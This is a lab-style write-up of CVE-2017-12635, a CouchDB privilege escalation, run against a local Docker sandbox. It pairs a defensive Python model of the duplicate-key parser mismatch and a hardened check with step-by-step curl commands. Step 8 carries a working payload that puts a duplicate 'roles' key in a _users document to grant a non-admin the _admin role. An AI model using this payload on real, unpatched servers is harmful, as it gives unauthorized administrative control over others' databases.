# Apache CouchDB < 1.7.0 / 2.x < 2.1.1 - CVE-2017-12635 - Remote Privilege Escalation
## Detail
- Apache CouchDB is a document-oriented NoSQL database, implemented in Erlang.
- Due to a discrepancy between CouchDB's Erlang-based JSON parser and its JavaScript-based JSON parser, CouchDB before 1.7.0 and 2.x before 2.1.1 allowed non-admin users to escalate privilege by submitting `_users` documents with duplicate `roles` keys. Roles are used for access control within the databases and include the special `_admin` role, which denotes administrative users. The JavaScript parser (used by the `_users` validation function) keeps the last value of a duplicated key, while the Erlang side reads the first one, so a document can pass validation with one set of roles and be acted on with another.
**To recap, the vulnerability allows non-admin users to give themselves admin privileges.**
- CouchDB uses a special database (called `_users` by default) to store information about registered users. This is a system database: while it shares the common database API, some additional security-related constraints and agreed document-structure conventions apply to it.
Only administrators may GET, PUT or DELETE any document in the `_users` database.
Non-admin users may only read (GET /_users/org.couchdb.user:\<username>) or modify (PUT /_users/org.couchdb.user:\<username>) the document they own.
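The parser discrepancy described above, as an added example (this is not code from this page or from CouchDB): the same user document is parsed under last-wins semantics (what JavaScript's `JSON.parse` does, and therefore what the `_users` validation function sees) and under first-wins semantics (what an Erlang proplist lookup returns). A small model of the relevant validation rules is applied to the last-wins view, and the roles are then read from the first-wins view. The validator here is a deliberate simplification, not CouchDB's real `validate_doc_update`; the function names and the sample bodies are constructed for this example. It also shows the check a hardened code path should make: refusing any body that contains a duplicate key, so that both parsers are guaranteed to see the same document.

```python
import json

# Constructed sample bodies (not captured traffic). POC_BODY has the same
# shape as the exploit document: "roles" appears twice, first ["_admin"], last [].
POC_BODY = ('{"name": "guest", "password": "guest", '
            '"roles": ["_admin"], "roles": [], "type": "user"}')
HONEST_ADMIN_BODY = '{"name": "guest", "password": "guest", "roles": ["_admin"], "type": "user"}'
PLAIN_USER_BODY = '{"name": "guest", "password": "guest", "roles": [], "type": "user"}'


def parse_last_wins(body):
    """Resolve duplicate keys like JavaScript's JSON.parse: the last value wins.
    Python's default dict construction behaves the same way."""
    return json.loads(body)


def parse_first_wins(body):
    """Resolve duplicate keys like an Erlang proplist lookup: the first value wins."""
    def first_wins(pairs):
        obj = {}
        for key, value in pairs:
            obj.setdefault(key, value)  # later duplicates are ignored
        return obj
    return json.loads(body, object_pairs_hook=first_wins)


def find_duplicate_keys(body):
    """Return the sorted list of keys that occur more than once in any object of the body."""
    dupes = set()

    def record(pairs):
        seen = set()
        for key, _ in pairs:
            if key in seen:
                dupes.add(key)
            seen.add(key)
        return dict(pairs)

    json.loads(body, object_pairs_hook=record)
    return sorted(dupes)


def validate_doc_update(new_doc, user_ctx):
    """Simplified model of the _users validation rules that matter here (not CouchDB's code):
    system roles (leading '_') are never allowed, and only an admin may set roles at all."""
    roles = new_doc.get("roles", [])
    if any(role.startswith("_") for role in roles):
        raise PermissionError("system roles (starting with _) are not allowed")
    if roles and "_admin" not in user_ctx.get("roles", []):
        raise PermissionError("only _admin may set roles")
    return True


def effective_roles(body, user_ctx=None):
    """Validate the last-wins view (what the JavaScript validator sees) and return the
    roles from the first-wins view (what the Erlang side would act on)."""
    user_ctx = user_ctx or {"name": None, "roles": []}  # anonymous, non-admin request
    validate_doc_update(parse_last_wins(body), user_ctx)  # raises if validation fails
    return parse_first_wins(body).get("roles", [])


def hardened_effective_roles(body, user_ctx=None):
    """Same pipeline, but any body with duplicate keys is rejected up front,
    so validation and storage are guaranteed to see the same document."""
    dupes = find_duplicate_keys(body)
    if dupes:
        raise ValueError("duplicate keys rejected: " + ", ".join(dupes))
    return effective_roles(body, user_ctx)


def is_rejected(func, body):
    """True if func(body) refuses the document, False if it is accepted."""
    try:
        func(body)
    except (PermissionError, ValueError):
        return True
    return False


if __name__ == "__main__":
    print("last-wins roles:", parse_last_wins(POC_BODY)["roles"])
    print("first-wins roles:", parse_first_wins(POC_BODY)["roles"])
    print("vulnerable path grants:", effective_roles(POC_BODY))
    print("hardened path rejects:", is_rejected(hardened_effective_roles, POC_BODY))
```

`HONEST_ADMIN_BODY` is refused by the validator, exactly as in the failed request of step 7, while `POC_BODY` slips through and yields `["_admin"]` from the first-wins view. The hardened variant catches the duplicate key before any parser-dependent decision is made, which is the property a fixed server needs: whatever rule resolves duplicates, both components must apply the same one, and the simplest way to guarantee that is to accept no duplicates at all.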
## Steps to exploit
1. Run docker image:
```docker container run -d --name couchdb-sandbox -p 5984:5984 couchdb:1.6.1```
2. Make sure the CouchDB instance is up and responding
```curl -X GET http://localhost:5984```
3. Query: All databases in the instance
```curl -X GET http://localhost:5984/_all_dbs```
4. Query: Create an admin account with credentials admin:admin (a fresh 1.x instance runs in "admin party" mode, so this unauthenticated request is accepted)
```curl -X PUT http://localhost:5984/_config/admins/admin -d '"admin"'```
5. Query: Try to create a new database named *records* without authentication
```curl -X PUT http://localhost:5984/records```
We can't create it: now that an admin exists, the unauthenticated request is no longer treated as admin, and only admins may create databases.
6. Query: Create a new database named records with admin authentication
```curl -X PUT http://admin:admin@localhost:5984/records```
7. Query: Create a new user document in the _users database (unauthenticated, i.e. as a non-admin) that asks for the _admin role
```
curl -X PUT http://localhost:5984/_users/org.couchdb.user:guest \
-H "Accept: application/json" \
-H "Content-Type: application/json" \
-d '{"name": "guest", "password": "guest", "roles": ["_admin"], "type": "user"}'
```
We can't create an account with the admin role this way: the `_users` validation function rejects a non-admin setting roles, and the `_admin` system role in particular.
8. Query: Create the same user document with the admin role smuggled in through a duplicate `roles` key (first value `["_admin"]`, last value `[]`)
```
curl -X PUT http://localhost:5984/_users/org.couchdb.user:guest \
-H "Accept: application/json" \
-H "Content-Type: application/json" \
-d '{"name": "guest", "password": "guest", "roles": ["_admin"], "roles": [], "type": "user"}'
```
We have an admin account now: the JavaScript validator saw the last `roles` value (`[]`) and accepted the document, while the Erlang side reads the first one (`["_admin"]`) when it builds the user's security context.
9. Query: Create a new database named new_records with guest authentication (an admin-only operation, so success confirms the escalation)
```curl -X PUT http://guest:guest@localhost:5984/new_records```
10. Query: Delete the database named new_records with guest authentication
```curl -X DELETE http://guest:guest@localhost:5984/new_records```